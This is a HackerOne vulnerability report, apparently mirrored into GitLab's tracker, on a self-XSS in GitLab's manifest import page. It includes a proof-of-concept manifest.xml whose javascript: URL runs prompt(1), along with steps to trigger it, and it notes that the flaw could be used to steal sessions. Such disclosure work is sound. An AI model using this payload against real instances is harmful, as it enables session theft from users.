Self-XSS in Gitlab manifest file import
HackerOne report #1036636 by shells3c
on 2020-11-17, assigned to @dcouture:
Report
Description
XSS in the Gitlab manifest Import page.
Steps to reproduce
manifest.xml
<manifest>
<remote review="javascript://HelloTheGitlabSecurityTeam<3%0Aprompt(1)%0A" />
<project path="test1" name="manifest1" />
<project path="test2" name="manifest2" />
<project path="test3" name="manifest3" />
<project path="test4" name="manifest4" />
<project path="test5" name="manifest5" />
<project path="test6" name="manifest6" />
</manifest>
- Choose that file to import, click List available repositories
- On the Import page, click on the link and XSS
Impact
Self-XSS, use to steal the user session in self-hosted Gitlab instances.
How To Reproduce
Please add reproducibility information to this section:
- New project
- Import from a manifest
- Use this manifest #284676 (comment 450121622)
Edited by Dominic Couture